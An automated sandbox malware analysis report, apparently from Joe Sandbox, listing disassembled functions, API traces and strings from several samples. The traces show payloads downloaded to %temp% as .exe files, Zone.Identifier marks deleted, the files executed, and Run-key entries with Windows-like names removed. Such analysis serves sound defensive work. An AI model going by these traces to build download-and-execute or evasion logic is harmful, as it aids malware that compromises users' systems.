                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 528846559-3424199868
                                                                                                                                                                                                      • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                      • Instruction ID: afdab107b7ea46b491ba3f785a3108c34962e981a5b403661ae60ceb940f9cda
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F11C974A04208EFDB14CF84C580B59B7B6FF49314F2081AAEC06AB381C775EE42DB95
                                                                                                                                                                                                      Function 00405EF0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 469056452-0
                                                                                                                                                                                                      • Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                                      • Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:16.8%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:3
                                                                                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FFB4ABE0F11 Relevance: 1.6, APIs: 1, Instructions: 126nativeCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000012.00000002.1798333623.00007FFB4ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABE0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_18_2_7ffb4abe0000_513318274.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InformationQuerySystem
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3562636166-0
                                                                                                                                                                                                      • Opcode ID: 7d57e6a14f5d7d094e2acf3ec34d5d0755946db4d20cd5d93544f3c4e942e958
                                                                                                                                                                                                      • Instruction ID: a10766e1e3caa77ecf138d55863d6555e333c5944a13414b2e8447f2efea783e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d57e6a14f5d7d094e2acf3ec34d5d0755946db4d20cd5d93544f3c4e942e958
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7331057090CB4C9FEB18EFA8D8456F9BBE1EB95321F10426FD049C3652CB616816CB81

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:27%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:72
                                                                                                                                                                                                      Total number of Limit Nodes:2
                                                                                                                                                                                                      execution_graph 231 7e13bf _XcptFilter 241 7e150f 242 7e154b 241->242 244 7e1521 241->244 243 7e1546 ?terminate@ 243->242 244->242 244->243 232 7e1958 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 233 7e1a4a GetCurrentProcess TerminateProcess 232->233 234 7e1a42 _crt_debugger_hook 232->234 234->233 197 7e1246 216 7e17dc 197->216 199 7e1252 GetStartupInfoW 200 7e1283 199->200 201 7e1294 200->201 202 7e129c Sleep 200->202 203 7e12bf 201->203 204 7e12b5 _amsg_exit 201->204 202->200 205 7e12e8 203->205 206 7e12c8 _initterm_e 203->206 204->205 207 7e12f7 _initterm 205->207 208 7e1312 205->208 206->205 210 7e12e3 __onexit 206->210 207->208 209 7e1317 InterlockedExchange 208->209 213 7e131f __IsNonwritableInCurrentImage 208->213 209->213 211 7e13ef 211->210 212 7e13f7 _cexit 211->212 212->210 213->210 213->211 215 7e13a3 exit 213->215 217 7e10a0 Sleep 213->217 215->213 216->199 229 7e1000 ExpandEnvironmentStringsW wsprintfW 217->229 220 7e110e RegOpenKeyExW 222 7e1163 Sleep RegOpenKeyExW 220->222 224 7e112d 220->224 221 7e11c3 221->213 222->221 223 7e118d 222->223 227 7e11b9 RegCloseKey 223->227 228 7e11a5 RegDeleteValueW 223->228 225 7e1159 RegCloseKey 224->225 226 7e1145 RegDeleteValueW 224->226 225->222 226->224 227->221 228->223 230 7e1049 229->230 230->220 230->221 245 7e1424 247 7e1432 __set_app_type _encode_pointer __p__fmode __p__commode 245->247 248 7e14d1 _pre_c_init __RTC_Initialize 247->248 249 7e14df __setusermatherr 248->249 250 7e14eb 248->250 249->250 255 7e185a _controlfp_s 250->255 253 7e14f9 _configthreadlocale 254 7e1502 253->254 256 7e1876 _invoke_watson 255->256 257 7e14f0 255->257 256->257 257->253 257->254 235 7e1835 _except_handler4_common 258 7e1505 261 7e1888 258->261 260 7e150a 260->260 262 7e18ad 261->262 263 7e18ba GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 261->263 262->263 264 7e18b1 262->264 263->264 264->260 236 7e13d3 237 7e13ef 236->237 238 7e13e8 _exit 236->238 239 7e13f7 _cexit 237->239 240 7e13fd __onexit 237->240 238->237 239->240 265 7e1200 270 7e160b 265->270 268 7e123d _amsg_exit 269 7e1245 268->269 273 7e1566 270->273 272 7e1205 __wgetmainargs 272->268 272->269 280 7e17dc 273->280 275 7e1572 _decode_pointer 276 7e1589 _onexit 275->276 277 7e1595 7 API calls 275->277 278 7e15f9 __onexit 276->278 281 7e1602 _unlock 277->281 278->272 280->275 281->278

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 007E10A0 Relevance: 36.8, APIs: 8, Strings: 13, Instructions: 78registrysleepCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 007E10AB
                                                                                                                                                                                                        • Part of subcall function 007E1000: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007E101A
                                                                                                                                                                                                        • Part of subcall function 007E1000: wsprintfW.USER32 ref: 007E1033
                                                                                                                                                                                                        • Part of subcall function 007E1000: PathFileExistsW.KERNELBASE(?), ref: 007E1043
                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,?), ref: 007E1123
                                                                                                                                                                                                      • RegDeleteValueW.KERNELBASE(?,Microsoft Windows Service), ref: 007E1151
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 007E115D
                                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 007E1168
                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,?), ref: 007E1183
                                                                                                                                                                                                      • RegDeleteValueW.KERNELBASE(?,Microsoft Windows Service), ref: 007E11B1
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 007E11BD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000019.00000002.1887776931.00000000007E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000019.00000002.1887705534.00000000007E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000019.00000002.1887832936.00000000007E2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000019.00000002.1887864122.00000000007E3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000019.00000002.1887893361.00000000007E4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000019.00000002.1887931455.00000000007E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7e0000_2573513776.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDeleteOpenSleepValue$EnvironmentExistsExpandFilePathStringswsprintf
                                                                                                                                                                                                      • String ID: (#~$Host Process for Windows Services$L$~$Microsoft Windows Driver$Microsoft Windows Service$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Operating System$Windows Update 4950505060$Windows Update 75849348$Windows Upgrade 40885040$`#~$$~
                                                                                                                                                                                                      • API String ID: 2575504554-1775992416
                                                                                                                                                                                                      • Opcode ID: 8afbfaf8c1f167eb4ded66f9e339736b4f2d777d804001de6bb47a1cc9d1a4cc
                                                                                                                                                                                                      • Instruction ID: 3994cc4cbb37eadd7626d6c0fd775b95a649b143ce6f17fa9a5e33176da2eda2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8afbfaf8c1f167eb4ded66f9e339736b4f2d777d804001de6bb47a1cc9d1a4cc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60311A7090229CEBDB04DFD6ED89FAD7BB9BB0C309F504418F6016A282D7B85946CF54
                                                                                                                                                                                                      Function 007E1000 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 41fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 16 7e1000-7e104b ExpandEnvironmentStringsW wsprintfW 18 7e104d-7e104f 16->18 19 7e1053-7e107c 16->19 20 7e108d-7e1090 18->20 22 7e107e-7e1084 19->22 23 7e108b 19->23 22->23 23->20
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007E101A
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 007E1033
                                                                                                                                                                                                      • PathFileExistsW.KERNELBASE(?), ref: 007E1043
                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 007E1069
                                                                                                                                                                                                      • CloseHandle.KERNELBASE(000000FF), ref: 007E1085
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000019.00000002.1887776931.00000000007E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000019.00000002.1887705534.00000000007E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000019.00000002.1887832936.00000000007E2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000019.00000002.1887864122.00000000007E3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000019.00000002.1887893361.00000000007E4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000019.00000002.1887931455.00000000007E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7e0000_2573513776.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                      • String ID: %s\dd55ddff6fd.txt$%temp%$@1Wu.Wu$^Iu
                                                                                                                                                                                                      • API String ID: 750032643-1779842963
                                                                                                                                                                                                      • Opcode ID: b9a09b4013d908e803c14047f99af56a667ed140aa0d076af914b8a2b2a099c3
                                                                                                                                                                                                      • Instruction ID: 3ef9de1b8fa796d447de1e03cd91f86bf028d03d352dc42f5d30a7fe3b12851e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9a09b4013d908e803c14047f99af56a667ed140aa0d076af914b8a2b2a099c3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D00184B5941348ABD7209B609C4AFE5733CAB48700F408294A7199A0D2DAB85AC6CFB8

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 004110B0 Relevance: 59.7, APIs: 28, Strings: 6, Instructions: 183filenetworksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004110B9
                                                                                                                                                                                                      • srand.MSVCR90 ref: 004110C0
                                                                                                                                                                                                      • DeleteUrlCacheEntryW.WININET(?), ref: 004110CC
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004110EA
                                                                                                                                                                                                      • rand.MSVCR90 ref: 004110F0
                                                                                                                                                                                                      • rand.MSVCR90 ref: 00411104
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0041112B
                                                                                                                                                                                                      • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00411141
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041116D
                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0041119C
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004111CF
                                                                                                                                                                                                      • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 00411200
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0041120F
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00411228
                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?), ref: 00411238
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 00411263
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00411270
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041127D
                                                                                                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 00411288
                                                                                                                                                                                                      • rand.MSVCR90 ref: 0041129D
                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 004112B4
                                                                                                                                                                                                      • rand.MSVCR90 ref: 004112BA
                                                                                                                                                                                                      • rand.MSVCR90 ref: 004112CE
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004112F5
                                                                                                                                                                                                      • DeleteUrlCacheEntryW.WININET(?), ref: 00411302
                                                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00411319
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00411335
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00411345
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 0041113C
                                                                                                                                                                                                      • %s\%d%d.exe, xrefs: 0041111F
                                                                                                                                                                                                      • %temp%, xrefs: 004110E5
                                                                                                                                                                                                      • %s:Zone.Identifier, xrefs: 0041121C
                                                                                                                                                                                                      • %s:Zone.Identifier, xrefs: 00411329
                                                                                                                                                                                                      • %s\%d%d.exe, xrefs: 004112E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001C.00000002.2053632789.0000000000411000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00410000, based on PE: true
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053588950.0000000000410000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053654739.0000000000412000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053676265.0000000000414000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_410000_28849683.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Internetrand$CloseDeleteHandlewsprintf$CacheEntryOpenSleep$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                                                                                      • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                                                      • API String ID: 3548267932-1161929716
                                                                                                                                                                                                      • Opcode ID: 8f5ee508648bbd0d55dd2d48bece4dd54db7aec8082d6737f8ff6cc39f4316b0
                                                                                                                                                                                                      • Instruction ID: 131f41112352d0affa975f24703ccccca453d5509dedeeda87730ae441918df4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f5ee508648bbd0d55dd2d48bece4dd54db7aec8082d6737f8ff6cc39f4316b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2619475940218ABD724DB60DC49FEA7779AB4C701F048599F70EE2190DAB8ABD0CF68
                                                                                                                                                                                                      Function 00411000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 18 411000-411060 memset * 2 CreateProcessW 19 411071-411095 ShellExecuteW 18->19 20 411062-41106f Sleep 18->20 22 411097-4110a4 Sleep 19->22 23 4110a6 19->23 21 4110a8-4110ab 20->21 22->21 23->21
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCR90 ref: 0041100E
                                                                                                                                                                                                      • memset.MSVCR90 ref: 0041101E
                                                                                                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00411057
                                                                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00411067
                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00411082
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041109C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001C.00000002.2053632789.0000000000411000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00410000, based on PE: true
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053588950.0000000000410000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053654739.0000000000412000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053676265.0000000000414000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_410000_28849683.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                                      • String ID: $D$open
                                                                                                                                                                                                      • API String ID: 3787208655-2182757814
                                                                                                                                                                                                      • Opcode ID: 372d0affcf64b698c42138d90470aeb86b5eeeba7156468f9a2df0710b619415
                                                                                                                                                                                                      • Instruction ID: 9995ca1667c9cb8d198285e91f865ec12aaa7240dd4f06e66b0eaeba3cad2778
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 372d0affcf64b698c42138d90470aeb86b5eeeba7156468f9a2df0710b619415
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20114271E80308BBEB10DB90DD46FEE7775AB18B01F204116FB08AE2D0D6F55A84CB69
                                                                                                                                                                                                      Function 004113C0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 41fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 24 4113c0-41140b ExpandEnvironmentStringsW wsprintfW 26 411413-41143c CreateFileW 24->26 27 41140d-41140f 24->27 29 41144b 26->29 30 41143e-411445 CloseHandle 26->30 28 41144d-411450 27->28 29->28 30->29
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004113DA
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004113F3
                                                                                                                                                                                                      • PathFileExistsW.KERNELBASE(?), ref: 00411403
                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00411429
                                                                                                                                                                                                      • CloseHandle.KERNELBASE(000000FF), ref: 00411445
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001C.00000002.2053632789.0000000000411000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00410000, based on PE: true
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053588950.0000000000410000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053654739.0000000000412000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053676265.0000000000414000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_410000_28849683.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                      • String ID: %s\roapalr.jpg$%temp%$^Iu
                                                                                                                                                                                                      • API String ID: 750032643-210158717
                                                                                                                                                                                                      • Opcode ID: 2a555bf4d162e77474d985d4918bd64bbbdb168b1c64cd6f04d53e58525a9470
                                                                                                                                                                                                      • Instruction ID: 6cafc7f210ac8de9fd2863cca0c7e2a6a167b84966e14652d56c9984bc6c1b31
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a555bf4d162e77474d985d4918bd64bbbdb168b1c64cd6f04d53e58525a9470
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD01D4B050030CABD720CB20DD49FE63738AB04704F0086A5AB19E20D1D7F45AD5CFA9
                                                                                                                                                                                                      Function 00411360 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 31 411360-4113ab ExpandEnvironmentStringsW wsprintfW 33 4113b1 31->33 34 4113ad-4113af 31->34 35 4113b3-4113b6 33->35 34->35
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 0041137A
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00411393
                                                                                                                                                                                                      • PathFileExistsW.KERNELBASE(?), ref: 004113A3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001C.00000002.2053632789.0000000000411000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00410000, based on PE: true
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053588950.0000000000410000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053654739.0000000000412000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053676265.0000000000414000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_410000_28849683.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: EnvironmentExistsExpandFilePathStringswsprintf
                                                                                                                                                                                                      • String ID: %s\Program Files (x86)$%systemdrive%$^Iu
                                                                                                                                                                                                      • API String ID: 3337111443-1021027912
                                                                                                                                                                                                      • Opcode ID: a9559f3799143890475e3639465130098ba25fd74cad215b06429f5ad569b9f2
                                                                                                                                                                                                      • Instruction ID: 1fe642cab721409d24171f0537e14ccf93d961ded27ecebc32bcc0d115d41732
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9559f3799143890475e3639465130098ba25fd74cad215b06429f5ad569b9f2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3E0E5B050020C5BDB10DB60AD49FEA3728A704300F0082E5AB18D2150E6F496E8DBAD
                                                                                                                                                                                                      Function 00411460 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 18sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 36 411460-411478 Sleep call 411360 39 411493-411496 36->39 40 41147a-411484 call 4113c0 36->40 40->39 43 411486-41148b call 4110b0 40->43 45 411490 43->45 45->39
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 00411468
                                                                                                                                                                                                        • Part of subcall function 00411360: ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 0041137A
                                                                                                                                                                                                        • Part of subcall function 00411360: wsprintfW.USER32 ref: 00411393
                                                                                                                                                                                                        • Part of subcall function 00411360: PathFileExistsW.KERNELBASE(?), ref: 004113A3
                                                                                                                                                                                                        • Part of subcall function 004113C0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004113DA
                                                                                                                                                                                                        • Part of subcall function 004113C0: wsprintfW.USER32 ref: 004113F3
                                                                                                                                                                                                        • Part of subcall function 004113C0: PathFileExistsW.KERNELBASE(?), ref: 00411403
                                                                                                                                                                                                        • Part of subcall function 004110B0: GetTickCount.KERNEL32 ref: 004110B9
                                                                                                                                                                                                        • Part of subcall function 004110B0: srand.MSVCR90 ref: 004110C0
                                                                                                                                                                                                        • Part of subcall function 004110B0: DeleteUrlCacheEntryW.WININET(?), ref: 004110CC
                                                                                                                                                                                                        • Part of subcall function 004110B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004110EA
                                                                                                                                                                                                        • Part of subcall function 004110B0: rand.MSVCR90 ref: 004110F0
                                                                                                                                                                                                        • Part of subcall function 004110B0: rand.MSVCR90 ref: 00411104
                                                                                                                                                                                                        • Part of subcall function 004110B0: wsprintfW.USER32 ref: 0041112B
